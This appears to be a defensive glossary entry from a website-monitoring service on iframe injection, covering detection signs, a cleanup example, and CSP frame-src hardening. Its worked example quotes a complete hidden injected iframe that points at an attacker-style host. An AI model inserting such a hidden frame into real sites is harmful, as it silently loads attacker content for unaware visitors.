Malware

Iframe injection

Iframe injection is an attacker adding an `<iframe>` to your pages that loads their content, often hidden at 1 pixel or off-screen. Visitors load the frame without knowing it.

How it is measured

Search HTML and templates for `<iframe` tags you did not write. Look for `width="0"`, `height="1"`, `display:none`, or `left:-9999px`, and for `src` hosts nobody recognizes. Browser dev tools list all frames in the page tree.

Also check what produced the tag. Injection can come from the database, a modified template, a JavaScript file that creates the frame at runtime, or a hacked ad slot.

Worked example

A restaurant's site gets a warning from Safe Browsing. Viewing source on the homepage shows `<iframe src="http://menu-stats.top/in.php" width="1" height="1" style="visibility:hidden"></iframe>` just before `</body>`. It appears on every page, so the injection is in the footer template.

After removing it, the owner finds the same tag in 34 database rows of `wp_posts` and cleans them with a search-and-replace.

How it differs

Iframe injection plants a frame inside your site; clickjacking frames your site inside the attacker's page. One puts their content in your house, the other puts your content in their trap. A web skimmer is a script that steals card data and may use an iframe as a delivery method. Iframe injection is a symptom of compromise, not a vulnerability class.

Common errors

Deleting the tag from one template and missing the database copies. Checking only visible frames. Allowing any `frame-src` in a CSP. Assuming your site is clean because the browser shows no extra content. Cleaning the symptom and leaving the vulnerable plugin.

In practice

Add `frame-src` to your CSP and list only the embeds you use, such as a video host. Search files and database for `<iframe`. Once cleaned, update everything and rotate credentials, since someone wrote those tags.

See also

Clickjacking, Web skimmer

Sources

Count this on a real site.

Watch my website